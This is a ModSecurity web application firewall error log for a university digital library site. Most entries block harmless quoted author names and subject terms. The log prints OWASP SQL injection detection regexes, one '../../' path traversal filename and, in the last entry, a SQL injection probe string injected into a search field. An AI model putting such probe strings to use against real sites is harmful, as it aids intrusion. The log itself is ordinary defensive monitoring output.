[Tue Aug 29 14:06:04.671171 2023] [:error] [pid 5522] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22CARTER, DK.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2Y3MCo-f0AABWSuUAAAAAE"]
[Mon Aug 28 06:51:42.672296 2023] [:error] [pid 37407] [client 47.128.24.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22WOrkforce\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvhjsCo-f0AAJIfRKwAAAAN"]
[Mon Aug 28 06:54:59.340844 2023] [:error] [pid 37401] [client 47.128.21.159] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Xiaojun Wang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOviU8Co-f0AAJIZSCQAAAAF"]
[Mon Aug 28 07:00:48.522829 2023] [:error] [pid 37313] [client 47.128.28.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Thameem Basha Hayath\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvjsMCo-f0AAJHB4s8AAAAD"]
[Mon Aug 28 07:07:50.407103 2023] [:error] [pid 37619] [client 47.128.20.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Todd Spires\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvlVsCo-f0AAJLzWKAAAAAC"]
[Mon Aug 28 07:11:42.573136 2023] [:error] [pid 37420] [client 47.128.19.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Visualization\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvmPsCo-f0AAJIsQssAAAAV"]
[Mon Aug 28 07:12:35.653133 2023] [:error] [pid 37313] [client 47.128.23.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22L24\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvmc8Co-f0AAJHB40YAAAAD"]
[Mon Aug 28 07:15:19.968987 2023] [:error] [pid 37416] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Buongiorno nano\\xef\\xac\\x82uid model\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnF8Co-f0AAJIobFAAAAAR"]
[Mon Aug 28 07:15:21.818789 2023] [:error] [pid 37760] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Certi\\xef\\xac\\x81cation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnGcCo-f0AAJOAZq8AAAAM"]
[Mon Aug 28 07:15:23.546326 2023] [:error] [pid 37312] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\xef\\xac\\x82 found within ARGS:subject: \\x22Compressive and \\xef\\xac\\x82exural strength\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnG8Co-f0AAJHAk8oAAAAY"]
[Mon Aug 28 07:15:25.409021 2023] [:error] [pid 37313] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\xef\\xac\\x81 found within ARGS:subject: \\x22Entrepreneurial \\xef\\xac\\x81nance\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnHcCo-f0AAJHB48oAAAAD"]
[Mon Aug 28 07:15:27.188020 2023] [:error] [pid 37539] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Halal Certi\\xef\\xac\\x81cation through Assessment and Accredit\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnH8Co-f0AAJKjZXMAAAAG"]
[Mon Aug 28 07:15:28.936668 2023] [:error] [pid 37619] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Halal certi\\xef\\xac\\x81cation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnIMCo-f0AAJLzWWMAAAAC"]
[Mon Aug 28 07:15:30.816225 2023] [:error] [pid 37721] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Industry\\xe2\\x80\\x93university collaboration\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnIsCo-f0AAJNZd9kAAAAJ"]
[Mon Aug 28 07:15:32.713314 2023] [:error] [pid 37539] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\xef\\xac\\x81 found within ARGS:subject: \\x22International \\xef\\xac\\x81eld experience\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnJMCo-f0AAJKjZXUAAAAG"]
[Mon Aug 28 07:15:34.501333 2023] [:error] [pid 37401] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\xef\\xac\\x82 found within ARGS:subject: \\x22Manufacturing \\xef\\xac\\x82exibility\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnJsCo-f0AAJIZSscAAAAF"]
[Mon Aug 28 07:15:36.460343 2023] [:error] [pid 37760] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Recon\\xef\\xac\\x81gurability\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnKMCo-f0AAJOAZrUAAAAM"]
[Mon Aug 28 07:15:38.356519 2023] [:error] [pid 37313] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Re\\xef\\xac\\x82ection\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnKsCo-f0AAJHB484AAAAD"]
[Mon Aug 28 07:15:40.208280 2023] [:error] [pid 37451] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Risk identi\\xef\\xac\\x81cation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnLMCo-f0AAJJLqYYAAAAA"]
[Mon Aug 28 07:15:42.110838 2023] [:error] [pid 37539] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Risk quali\\xef\\xac\\x81cation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnLsCo-f0AAJKjZXgAAAAG"]
[Mon Aug 28 07:15:44.028485 2023] [:error] [pid 37312] [client 65.108.0.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x99  found within ARGS:subject: \\x22Students\\xe2\\x80\\x99 perceptions and attitude\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnMMCo-f0AAJHAk88AAAAY"]
[Mon Aug 28 07:16:32.889117 2023] [:error] [pid 37416] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Simon Dunstall\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvnYMCo-f0AAJIobGIAAAAR"]
[Mon Aug 28 07:21:29.805171 2023] [:error] [pid 37312] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Gul Polat\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvoicCo-f0AAJHAlM4AAAAY"]
[Mon Aug 28 07:23:17.448019 2023] [:error] [pid 37768] [client 47.128.19.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Flexibility\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvo9cCo-f0AAJOIfVwAAAAK"]
[Mon Aug 28 07:23:54.504550 2023] [:error] [pid 37619] [client 47.128.30.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Process improvement\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvpGsCo-f0AAJLzWdIAAAAC"]
[Mon Aug 28 07:24:30.459445 2023] [:error] [pid 37807] [client 47.128.26.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTS.EMER.2020.017.gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOvpPsCo-f0AAJOvR20AAAAP"]
[Mon Aug 28 07:34:50.063864 2023] [:error] [pid 37881] [client 47.128.19.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sunghae Jun\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvrqsCo-f0AAJP5ThgAAAAK"]
[Mon Aug 28 07:35:12.328191 2023] [:error] [pid 37806] [client 47.128.17.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Complementarity\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvrwMCo-f0AAJOuUVEAAAAO"]
[Mon Aug 28 07:39:50.017661 2023] [:error] [pid 37916] [client 37.19.221.152] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Jurnal Teknik Industri\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvs1sCo-f0AAJQcJygAAAAF"]
[Mon Aug 28 07:39:50.735748 2023] [:error] [pid 37882] [client 37.19.221.152] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  (<'\\x22> found within ARGS:subject: \\x22Jurnal Teknik Industri\\x22'nvOpzp; AND 1=1 OR (<'\\x22>iKO)),"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvs1sCo-f0AAJP6BK0AAAAM"]
